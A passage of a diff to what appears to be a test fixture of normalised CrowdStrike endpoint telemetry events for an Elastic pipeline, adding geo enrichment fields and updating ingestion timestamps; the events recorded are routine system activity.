"{\"event_simpleName\":\"TerminateProcess\",\"RawProcessId\":\"76482\",\"ContextTimeStamp\":\"1625677510.959\",\"ConfigStateHash\":\"1284133626\",\"ContextProcessId\":\"130732827553316\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0010912.1\",\"event_platform\":\"Lin\",\"TargetProcessId\":\"130732827553316\",\"Entitlements\":\"15\",\"name\":\"TerminateProcessLinV2\",\"id\":\"ffffffff-1111-11eb-97d0-02b2813216eb\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffdd094539a02b394c69a70aaf\",\"timestamp\":\"1625677511067\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:11.067Z", "kind": "event", @@ -5000,21 +5651,33 @@ "ContextProcessId": "130732827553316", "Entitlements": "15", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "ffffffff70cf4070af024397f25007c7", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff70cf4070af024397f25007c7", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:02:52.544Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -5029,8 +5692,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150987400Z", + "ingested": "2021-12-14T14:41:26.533776712Z", "original": "{\"ConfigBuild\":\"1007.4.0013701.1\",\"event_simpleName\":\"FirewallEnabled\",\"event_platform\":\"Mac\",\"ConfigStateHash\":\"3090255842\",\"Entitlements\":\"15\",\"name\":\"FirewallEnabledMacV1\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-a9e6-067d21325a03\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff70cf4070af024397f25007c7\",\"timestamp\":\"1625677372544\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:02:52.544Z", "kind": "event", @@ -5061,17 +5727,23 @@ }, { "observer": { - "serial_number": "ffffffffed984e248973f3ada1eb543d", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffed984e248973f3ada1eb543d", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:02:12.283Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -5086,8 +5758,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150997400Z", + "ingested": "2021-12-14T14:41:26.533777119Z", "original": "{\"event_simpleName\":\"FsVolumeUnmounted\",\"VolumeName\":\"Install Google Drive\",\"ContextTimeStamp\":\"1625677332.283\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"VolumeMediaBSDName\":\"disk2s2\",\"VolumeMountPoint\":\"/private/tmp/KSInstallAction.dn6J5Xa1M4/m\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"FsVolumeUnmountedMacV1\",\"id\":\"ffffffff-1111-11eb-8fd9-06866dcbd3d5\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffed984e248973f3ada1eb543d\",\"timestamp\":\"1625677334451\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"VolumeIsNetwork\":\"0\"}", "created": "2021-07-07T17:02:14.451Z", "kind": "event", @@ -5148,12 +5823,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffff2a0d484da8f7a9cf8bde7164", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011308.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff2a0d484da8f7a9cf8bde7164", + "type": "agent", + "version": "1007.8.0011308.1" }, "@timestamp": "2021-07-07T17:04:34.525Z", "ecs": { @@ -5173,7 +5857,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151003800Z", + "ingested": "2021-12-14T14:41:26.533777550Z", "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkListenIP4\",\"ContextTimeStamp\":\"1625677474.525\",\"ConfigStateHash\":\"2300098580\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"328911864662804336\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"23165\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP4LinV5\",\"id\":\"ffffffff-1111-11eb-88fd-06a17d0fdc05\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff2a0d484da8f7a9cf8bde7164\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677474879\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:34.879Z", "kind": "event", @@ -5214,12 +5898,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff28414c2293e35c360213e723", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff28414c2293e35c360213e723", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:26.828Z", "file": { @@ -5251,7 +5944,7 @@ }, "event": { "action": "ELFFileWritten", - "ingested": "2021-12-09T13:36:11.151010100Z", + "ingested": "2021-12-14T14:41:26.533777940Z", "original": "{\"event_simpleName\":\"ELFFileWritten\",\"ContextTimeStamp\":\"1625677526.828\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"363122200934575406\",\"Size\":\"38798952\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027\",\"FileIdentifier\":\"040000010000000000000000000000006793f80200000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ELFFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-985c-02152dd35bc1\",\"ELFSubType\":\"4\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff28414c2293e35c360213e723\",\"timestamp\":\"1625677527114\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.M2zGjQ/_platform_specific/x86-64/zoom_x86_64.nexe\"}", "id": "ffffffff-1111-11eb-985c-02152dd35bc1", "created": "2021-07-07T17:05:27.114Z" @@ -5267,18 +5960,23 @@ }, { "observer": { - "serial_number": "ffffffff2d1245c0a32d5efcf9351272", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "6.19.11611.0", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff2d1245c0a32d5efcf9351272", + "type": "agent", + "version": "6.19.11611.0" }, "@timestamp": "2021-07-07T17:03:03.466Z", - "os": { - "type": "linux", - "version": "Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 x86_64" - }, "ecs": { "version": "1.12.0" }, @@ -5293,8 +5991,12 @@ "67.43.156.14" ] }, + "os": { + "type": "linux", + "version": "Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 x86_64" + }, "event": { - "ingested": "2021-12-09T13:36:11.151016300Z", + "ingested": "2021-12-14T14:41:26.533778327Z", "original": "{\"MajorVersion\":\"4\",\"event_simpleName\":\"OsVersionInfo\",\"OSVersionFileData\":\"4e414d453d22416d617a6f6e204c696e7578220a56455253494f4e3d2232220a49443d22616d7a6e220a49445f4c494b453d2263656e746f73207268656c206665646f7261220a56455253494f4e5f49443d2232220a5052455454595f4e414d453d22416d617a6f6e204c696e75782032220a414e53495f434f4c4f523d22303b3333220a4350455f4e414d453d226370653a322e333a6f3a616d617a6f6e3a616d617a6f6e5f6c696e75783a32220a484f4d455f55524c3d2268747470733a2f2f616d617a6f6e6c696e75782e636f6d2f220a\",\"BootArgs\":\"BOOT_IMAGE\\u003d/boot/vmlinuz-4.14.232-176.381.amzn2.x86_64 root\\u003dUUID\\u003d9f548782-8f9f-4dd9-873a-436ea8f3e8a6 ro console\\u003dtty0 console\\u003dttyS0,115200n8 net.ifnames\\u003d0 biosdevname\\u003d0 nvme_core.io_timeout\\u003d4294967295 rd.emergency\\u003dpoweroff rd.shell\\u003d0\",\"ConfigStateHash\":\"3712162471\",\"AgentVersion\":\"6.19.11611.0\",\"aip\":\"67.43.156.14\",\"MinorVersion\":\"14\",\"OSVersionString\":\"Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 x86_64\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"OsVersionInfoLinV4\",\"RFMState\":\"1\",\"id\":\"ffffffff-1111-11eb-93d4-0624c36f3a79\",\"OSVersionFileName\":\"/etc/os-release\",\"aid\":\"ffffffff2d1245c0a32d5efcf9351272\",\"timestamp\":\"1625677383466\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:03.466Z", "kind": "event", @@ -5355,12 +6057,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff761b4a7d9962dd9e7e776044", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff761b4a7d9962dd9e7e776044", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:03:59.099Z", "file": { @@ -5385,7 +6096,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151022700Z", + "ingested": "2021-12-14T14:41:26.533778723Z", "original": "{\"event_simpleName\":\"CriticalFileModified\",\"ContextTimeStamp\":\"1625677439.099\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364849347227309005\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"FileIdentifier\":\"04000001000000000000000000000000cdf3100100000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"USN\":\"89566685\",\"event_platform\":\"Mac\",\"UnixMode\":\"384\",\"Entitlements\":\"15\",\"name\":\"CriticalFileModifiedMacV2\",\"id\":\"ffffffff-1111-11eb-9262-0268ab613b49\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff761b4a7d9962dd9e7e776044\",\"timestamp\":\"1625677439398\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/dslocal/nodes/Default/users/user9.plist/\"}", "created": "2021-07-07T17:03:59.398Z", "kind": "alert", @@ -5417,17 +6128,23 @@ }, { "observer": { - "serial_number": "ffffffff01c7450180352a7c58a28fb4", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff01c7450180352a7c58a28fb4", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:49.786Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -5442,8 +6159,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.151029100Z", + "ingested": "2021-12-14T14:41:26.533779137Z", "original": "{\"event_simpleName\":\"NeighborListIP6\",\"ConfigStateHash\":\"3090255842\",\"NeighborList\":\"1C-AB-C0-9B-10-A2|2607:fea8:720:1bc8:1eab:c0ff:fe9b:10a2|0|\",\"aip\":\"67.43.156.14\",\"InterfaceIndex\":\"6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NeighborListIP6MacV1\",\"id\":\"ffffffff-1111-11eb-ac8a-06b5e1186139\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff01c7450180352a7c58a28fb4\",\"timestamp\":\"1625677489786\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:49.786Z", "kind": "state", @@ -5495,12 +6215,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffcebd42c0890d59b54279d3d3", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013806.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffcebd42c0890d59b54279d3d3", + "type": "agent", + "version": "1007.4.0013806.1" }, "@timestamp": "2021-07-07T17:03:02.785Z", "file": { @@ -5531,7 +6260,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151035400Z", + "ingested": "2021-12-14T14:41:26.533779575Z", "original": "{\"event_simpleName\":\"NewScriptWritten\",\"ContextTimeStamp\":\"1625677382.785\",\"UserName\":\"user3\",\"ConfigStateHash\":\"1325353086\",\"ContextProcessId\":\"364952259879648742\",\"Size\":\"8052\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6\",\"FileIdentifier\":\"04000001000000000000000000000000ef07570000000000\",\"ConfigBuild\":\"1007.4.0013806.1\",\"event_platform\":\"Mac\",\"IsOnRemovableDisk\":\"0\",\"Entitlements\":\"15\",\"name\":\"NewScriptWrittenMacV3\",\"id\":\"ffffffff-1111-11eb-9dc1-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffcebd42c0890d59b54279d3d3\",\"timestamp\":\"1625677383057\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user3/git/it_eng_scripts/depnotify_starter/dep_notify_starter.sh\"}", "created": "2021-07-07T17:03:03.057Z", "kind": "event", @@ -5559,17 +6288,23 @@ }, { "observer": { - "serial_number": "fffffffff2c7432859ff6bbe1a0bd6af", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "fffffffff2c7432859ff6bbe1a0bd6af", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:03:07.216Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -5584,8 +6319,11 @@ "67.43.156.13" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.151041700Z", + "ingested": "2021-12-14T14:41:26.533780038Z", "original": "{\"event_simpleName\":\"SystemCapacity\",\"ConfigStateHash\":\"1620585913\",\"aip\":\"67.43.156.13\",\"CpuClockSpeed\":\"2400000000\",\"PhysicalCoreCount\":\"8\",\"CpuFeaturesMask\":\"7494065083908067\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LogicalCoreCount\":\"16\",\"Entitlements\":\"15\",\"name\":\"SystemCapacityMacV1\",\"CpuVendor\":\"0\",\"CpuProcessorName\":\"Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz\",\"id\":\"ffffffff-1111-11eb-b714-066001392751\",\"CpuSignature\":\"591597\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"fffffffff2c7432859ff6bbe1a0bd6af\",\"ProcessorPackageCount\":\"1\",\"MemoryTotal\":\"17179869184\",\"timestamp\":\"1625677387216\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:07.216Z", "kind": "state", @@ -5624,17 +6362,23 @@ }, { "observer": { - "serial_number": "ffffffff0d7b4d839912e55b4755e85b", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff0d7b4d839912e55b4755e85b", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:02:48.429Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, @@ -5649,8 +6393,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.151048300Z", + "ingested": "2021-12-14T14:41:26.533780556Z", "original": "{\"event_simpleName\":\"FirmwareAnalysisStatus\",\"ConfigStateHash\":\"3090255842\",\"FirmwareAnalysisEclControlInterfaceVersion\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"FirmwareAnalysisEclConsumerInterfaceVersion\":\"0\",\"BootTimeFunctionalityLevel\":\"255\",\"ReasonOfFunctionalityLevel\":\"3\",\"CurrentFunctionalityLevel\":\"2\",\"Entitlements\":\"15\",\"name\":\"FirmwareAnalysisStatusMacV2\",\"id\":\"ffffffff-1111-11eb-ba57-0214a0d89bf7\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff0d7b4d839912e55b4755e85b\",\"timestamp\":\"1625677368429\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"PciAttachmentState\":\"65535\"}", "created": "2021-07-07T17:02:48.429Z", "kind": "state", @@ -5685,28 +6432,27 @@ ] }, { - "os": { - "type": "macos" - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], "observer": { - "serial_number": "ffffffff557f4b99a0afdea9ce8cd6fa", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff557f4b99a0afdea9ce8cd6fa", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:04.544Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, @@ -5723,8 +6469,24 @@ "67.43.156.14" ] }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { - "ingested": "2021-12-09T13:36:11.151054800Z", + "ingested": "2021-12-14T14:41:26.533780943Z", "original": "{\"OutOctets\":\"0\",\"CreationTimeStamp\":\"\",\"aip\":\"67.43.156.13\",\"OutMulticastPkts\":\"0\",\"InErrors\":\"0\",\"InterfaceAlias\":\"utun2\",\"InDiscards\":\"0\",\"InterfaceIndex\":\"17\",\"event_platform\":\"Mac\",\"InterfaceType\":\"1\",\"id\":\"ffffffff-1111-11eb-a272-0294ad12fbe7\",\"PhysicalAddressLength\":\"0\",\"InUcastPkts\":\"0\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677504544\",\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"LocalIpAddressIP4\",\"ConfigStateHash\":\"3090255842\",\"PhysicalAddress\":\"\",\"OutErrors\":\"0\",\"InUnknownProtos\":\"0\",\"OutUcastPkts\":\"0\",\"InMulticastPkts\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"InOctets\":\"0\",\"NetLuidIndex\":\"2\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressIP4MacV1\",\"aid\":\"ffffffff557f4b99a0afdea9ce8cd6fa\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:04.544Z", "kind": "state", @@ -5760,7 +6522,13 @@ "InUcastPkts": "0", "EffectiveTransmissionClass": "2", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -5795,12 +6563,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff70d140ca9ba97f0dddd14137", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.8.0009806.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff70d140ca9ba97f0dddd14137", + "type": "agent", + "version": "1007.8.0009806.1" }, "@timestamp": "2020-11-08T17:04:59.681Z", "ecs": { @@ -5820,7 +6597,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151061100Z", + "ingested": "2021-12-14T14:41:26.533781370Z", "original": "{\"CommandLine\":\"uname -a\",\"ConfigBuild\":\"1007.8.0009806.1\",\"ConfigStateHash\":\"4288861242\",\"Entitlements\":\"15\",\"GID\":\"0\",\"ImageFileName\":\"/bin/uname\",\"MD5HashData\":\"894356eb59e279696c304f07091b7fde\",\"NDRoot\":\"321385814512398584\",\"ParentProcessId\":\"321385814512398584\",\"ProcessEndTime\":\"1604855099.126\",\"ProcessGroupId\":\"0\",\"ProcessStartTime\":\"1604855099.126\",\"RGID\":\"0\",\"RUID\":\"0\",\"RawProcessId\":\"51342\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"de80fe0bd06a96543aaec5c634b08cbfc58dba88ea3a66871434a0dd3a9e9dfa\",\"SVGID\":\"0\",\"SVUID\":\"0\",\"SessionProcessId\":\"314116638974342642\",\"SourceProcessId\":\"321385814512398584\",\"SourceThreadId\":\"0\",\"TargetProcessId\":\"321385814512398605\",\"UID\":\"0\",\"aid\":\"ffffffff70d140ca9ba97f0dddd14137\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Lin\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-ac87-06decddc17a1\",\"name\":\"ProcessRollup2LinV5\",\"timestamp\":\"1604855099681\"}", "created": "2020-11-08T17:04:59.681Z", "kind": "event", @@ -5856,6 +6633,23 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffff75fc48f15cfe5f095e605c4c", + "type": "agent", + "version": "1007.4.0011104.1" + }, "process": { "pid": 28987, "thread": { @@ -5866,24 +6660,10 @@ "sha256": "6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0" } }, + "@timestamp": "2020-11-08T17:04:56.730Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff75fc48f15cfe5f095e605c4c", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0011104.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2020-11-08T17:04:56.730Z", "ecs": { "version": "1.12.0" }, @@ -5900,7 +6680,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151067300Z", + "ingested": "2021-12-14T14:41:26.533781775Z", "original": "{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ContextProcessId\":\"317713210176499254\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855096.730\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"28987\",\"SHA256HashData\":\"6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"317713210176499254\",\"aid\":\"ffffffff75fc48f15cfe5f095e605c4c\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-809e-02fff4e55a49\",\"name\":\"EndOfProcessMacV14\",\"timestamp\":\"1604855099646\"}", "created": "2020-11-08T17:04:59.646Z", "kind": "event", @@ -5934,7 +6714,13 @@ "NetworkCloseCount": 0, "SuspectStackCount": 0, "cid": "ffffffff30a3407dae27d0503611022d" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -5962,12 +6748,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffb5db4b2e7ec89aba537adcc2", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffb5db4b2e7ec89aba537adcc2", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:04:57.926Z", "ecs": { @@ -5986,7 +6781,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151073500Z", + "ingested": "2021-12-14T14:41:26.533782168Z", "original": "{\"AllocateVirtualMemoryCount\":\"0\",\"ArchiveFileWrittenCount\":\"0\",\"AsepWrittenCount\":\"0\",\"BinaryExecutableWrittenCount\":\"0\",\"CLICreationCount\":\"0\",\"ConHostId\":\"38188\",\"ConHostProcessId\":\"3099352216141\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextData\":\"\",\"ContextProcessId\":\"3100508103359\",\"ContextThreadId\":\"93436292950223\",\"ContextTimeStamp\":\"1604855097.926\",\"CreateProcessCount\":\"0\",\"CycleTime\":\"2937514388\",\"DirectoryCreatedCount\":\"0\",\"DirectoryEnumeratedCount\":\"1\",\"DnsRequestCount\":\"0\",\"DocumentFileWrittenCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ExeAndServiceCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"ExitCode\":\"0\",\"FileDeletedCount\":\"2\",\"GenericFileWrittenCount\":\"0\",\"ImageSubsystem\":\"3\",\"InjectedDllCount\":\"0\",\"InjectedThreadCount\":\"0\",\"KernelTime\":\"7500000\",\"MaxThreadCount\":\"4\",\"ModuleLoadCount\":\"38\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkConnectCountUdp\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkModuleLoadCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"ParentProcessId\":\"3099350649383\",\"PrivilegedProcessHandleCount\":\"0\",\"ProcessStartTime\":\"1604855096.463\",\"ProtectVirtualMemoryCount\":\"0\",\"QueueApcCount\":\"0\",\"RawProcessId\":\"33016\",\"RegKeySecurityDecreasedCount\":\"0\",\"RemovableDiskFileWrittenCount\":\"0\",\"RunDllInvocationCount\":\"0\",\"SH